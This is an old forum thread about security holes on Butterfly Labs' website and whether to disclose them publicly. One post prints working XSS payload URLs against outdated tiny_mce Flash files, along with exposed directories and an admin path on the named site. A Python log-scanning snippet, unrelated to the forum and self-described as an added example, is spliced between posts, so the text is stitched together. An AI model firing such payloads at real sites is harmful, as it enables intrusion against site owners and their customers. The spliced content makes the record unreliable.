Topic: BFL's site is incredibly amateur... (Read 2893 times)

legendary
Activity: 2576
Merit: 1087
May 15, 2013, 08:12:27 AM
#22
sense disagree with mope-pr. ALERT! seek clarification?

are you saying it's good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropriate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides, Zerlan etc)?

Yes, I certainly agree it's a tough call between protecting the innocent, and tarring and feathering incompetent admins into taking action.

I think the way that guy did it was better: "you register, I'll show you I can get your pw hash", a good mix of publicly outing them without actually posting the vulnerability itself letter by letter.

(also sorry for MPOE typo on my previous post... autocorrect :/  )

Maybe my opinion is coloured by me having an outstanding order with BFL, but I'm still giving them the benefit of the doubt, in that I understand what they are doing is hard. Maybe that makes me a sucker, time will tell, and if I do lose that money well that will be another one to chalk up to experience. I'm not so naive as to think that every btc 'investment' I make is gonna pay out. Anyway I think that's a different subject!

Me, I'd have contacted them at first, and *then* when they didn't do anything start escalating.
legendary
Activity: 1918
Merit: 1570
Bitcoin: An Idea Worth Spending
May 12, 2013, 12:25:59 PM
#21
Quote
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

The guy claims to do everything, but denies being the Project Manager, even though BFL doesn't officially have one, with him being the COO taking up that role.

I fed your chicken, Jody.
Sonny, I let the gardener go home early, therefore I'll finish planting the flowers.
I'll get that pallet, Dave.
This is the way we mop the floors, mop the floors, mop the floors...
"Cocksucker!" I love answering the emails.
"Any questions, folks, before we end the daily tour at BFL?"
"Acme Components? Yes, we would like to double our order. Make that 40 resisters, 10 power packs..."
So many anniversaries this month, luckily they have me in charge of the party supplies.
"Therefore, Bob, if you cancel your order, you'll lose your place in the queue. Do you really want to cancel, for we is about to ship. Honest Abe! Fine, and for not canceling we're sending you a 10% off coupon to offset the next price increase." Click! "Fuckin' cocksucker!"
Note to self: Make sure there's no known anomalies on the website today.
"One, two, three, four, five... I love counting fans in the warehouse."
Shoutbox: I confirm that bet.
Twitter: I AND BFL confirm our bets.
BT: It's a bet.
BFL Forum: That is why we bet...
Bum on the street: Sorry, bud. I gave my last real money at CES to some dude with a camera.
All my bags are pack, and I'm on the road again, (different song-->) https://www.youtube.com/watch?v=-cfc3rCQOuU
legendary
Activity: 2492
Merit: 1491
LEALANA Bitcoin Grim Reaper
May 12, 2013, 04:07:56 AM
#20
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.
Everything? Oh you mean like those half-assed updates that have no substance? Rrrrright lol

Don't make me laugh Joshy-boy.
hero member
Activity: 756
Merit: 522
May 11, 2013, 07:27:01 AM
#19
sense disagree with mope-pr. ALERT! seek clarification?

are you saying it's good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropriate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides, Zerlan etc)?
legendary
Activity: 1918
Merit: 1570
Bitcoin: An Idea Worth Spending
May 11, 2013, 12:41:45 AM
#18
Here's something interesting: http://webcache.googleusercontent.com/search?q=cache:V2NAhB0iUlwJ:butterflylabs.com/images/users/000/003/366/066/imageGallery/+&cd=2&hl=en&ct=clnk&gl=us

Quote
FAA Letter-Approval0001.jpg     06-Apr-2012 02:15    31K

I only know of one pilot associated with Butterfly Labs, and that person wouldn't have had access to BFL's computer at that time because https://bitcointalksearch.org/topic/m.1071218

It's a shame that image is no longer available. Or is it?
legendary
Activity: 2576
Merit: 1087
May 10, 2013, 08:00:25 PM
#17
sense disagree with mope-pr. ALERT! seek clarification?

are you saying it's good practice to out people's security vulnerabilities without contacting them first?
hero member
Activity: 482
Merit: 502
May 03, 2013, 07:05:09 PM
#16
At first I wanted to mention Aaron Swartz as a counter argument, but realized that MPOE-PR is right. Mostly shithole noncountries like Iran, USA or China are affected.
edit: to be a little positive +1 for Inaba's reaction.
hero member
Activity: 756
Merit: 522
May 03, 2013, 06:56:45 PM
#15
So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and its swfupload XSS. There are 2 separate XSS' here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done.

Pretty lulzy stuff.

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Yeah, right. In you know...Iran. Or whatever other shithole noncountry.
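Detection logic for the findings in the quoted post, as an added example that is not from the thread or from BFL: it scans Apache-style access-log lines for requests to the two legacy tiny_mce SWF files (flagging script-like content in the reflected parameters and a remote media URL) and for 200 responses on the bare directories the post found browsable. The log lines, client IPs and the "injected" heuristic are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Legacy Flash helpers from old tiny_mce plugins, as named in the post above, with
# the parameter each one reflected or fetched; serving them at all is the defect.
LEGACY_SWF = {
    "/js/tiny_mce/plugins/archiv/swf/swfupload.swf": ("movieName", "buttonText"),
    "/js/tiny_mce/plugins/media/moxieplayer.swf": ("url",),
}
# Bare directories the post found browsable; a 200 here is a hint, not proof.
WATCHED_DIRS = ("/upload/", "/images/", "/images/users/")
# Heuristic (an assumption, not a full XSS detector) for a reflected parameter.
INJECTED = re.compile(r"""[<>"']|\balert\s*\(|javascript:""", re.I)
# Common Log Format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return (client_ip, path, reason) for each request worth a look."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF: skip rather than guess
        ip, method, target, status = m.groups()
        parts = urlsplit(target)
        path = parts.path
        if path in LEGACY_SWF:
            reason = "legacy swf served"
            for pair in parts.query.split("&"):  # manual split: payloads may hold ';'
                key, _, val = pair.partition("=")
                if key not in LEGACY_SWF[path]:
                    continue
                val = unquote_plus(val)
                if key == "url" and re.match(r"https?://", val, re.I):
                    reason = "legacy swf: remote media url"
                elif INJECTED.search(val):
                    reason = f"legacy swf: script/markup in {key}"
            findings.append((ip, path, reason))
        elif method == "GET" and status == "200" and path in WATCHED_DIRS:
            findings.append((ip, path, "possible directory listing"))
    return findings

# Constructed sample log (documentation-range IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2013:18:30:01 +0000] "GET /js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);alert(1)// HTTP/1.1" 200 12345
203.0.113.7 - - [03/May/2013:18:30:05 +0000] "GET /js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=%3Cimg%20src=x%3E HTTP/1.1" 200 12345
203.0.113.7 - - [03/May/2013:18:30:09 +0000] "GET /js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.51.100.9/x.flv HTTP/1.1" 200 9000
203.0.113.7 - - [03/May/2013:18:30:12 +0000] "GET /images/users/ HTTP/1.1" 200 48211
198.51.100.2 - - [03/May/2013:18:31:00 +0000] "GET /images/logo.png HTTP/1.1" 200 3100
"""
```

Run `scan(SAMPLE_LOG.splitlines())` to see the four findings; the ordinary request for `/images/logo.png` produces none.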
legendary
Activity: 2576
Merit: 1087
May 03, 2013, 04:39:52 PM
#14
You posted it because you wanted to flex your e-peen.

I'm sure everyone is glad that you decided their time was best spent fixing this.
sr. member
Activity: 350
Merit: 250
May 03, 2013, 03:40:23 PM
#13
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.


At least you guys responded to this quick and got it fixed. There was a lot more that could have been done with malicious intent.
legendary
Activity: 994
Merit: 1000
May 03, 2013, 01:12:43 PM
#12
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

Say what you will about Josh's usual responses, but this IMO was the perfect reaction to this situation.

Crack the whip!
legendary
Activity: 1260
Merit: 1000
May 03, 2013, 10:49:24 AM
#11
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

legendary
Activity: 1834
Merit: 1094
Learning the troll avoidance button :)
May 03, 2013, 03:39:02 AM
#10
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something, especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing, and if someone breaks into their system they say: "It wasn't my fault, it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way too many amateurs running big projects. We need a way to legally knock them out.
Well said.
Agreed, hackers like exploring architecture and systems; it's a natural instinct and curiosity. Just make a good defense so we can learn.
'Sides, when we say evil hackers we mean evil crackers lol (evil soda crackers, since they are the new overlords XD)
sr. member
Activity: 350
Merit: 250
May 03, 2013, 02:36:16 AM
#9
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something, especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing, and if someone breaks into their system they say: "It wasn't my fault, it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way too many amateurs running big projects. We need a way to legally knock them out.
Well said.
member
Activity: 85
Merit: 10
May 03, 2013, 02:24:59 AM
#8
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something, especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing, and if someone breaks into their system they say: "It wasn't my fault, it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way too many amateurs running big projects. We need a way to legally knock them out.
legendary
Activity: 1834
Merit: 1094
Learning the troll avoidance button :)
May 02, 2013, 10:17:56 PM
#7
Not the right directory I believe
sr. member
Activity: 287
Merit: 250
May 02, 2013, 10:12:22 PM
#6
While it's good of you to alert people, I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
The fastest way to get anything fixed is public outing.
It's fine and dandy to believe that, except by outing this, you've put other people's information at risk. Let's say somebody does get into BFL's systems, what kind of information do you think they have stored on their servers? Information that somebody who has a vendetta against bitcoin could put to good use, such as the mailing addresses of tens of thousands of people. Not to mention any related payment information.
legendary
Activity: 1834
Merit: 1094
Learning the troll avoidance button :)
May 02, 2013, 10:11:20 PM
#5
That's weak coding. Nice infiltration, do that myself sometimes.
http://www.butterflylabs.com/images/admin/butterfly-admin.jpg
sr. member
Activity: 350
Merit: 250
May 02, 2013, 10:03:18 PM
#4
While it's good of you to alert people, I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
The fastest way to get anything fixed is public outing.
sr. member
Activity: 606
Merit: 273
May 02, 2013, 09:31:04 PM
#3
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.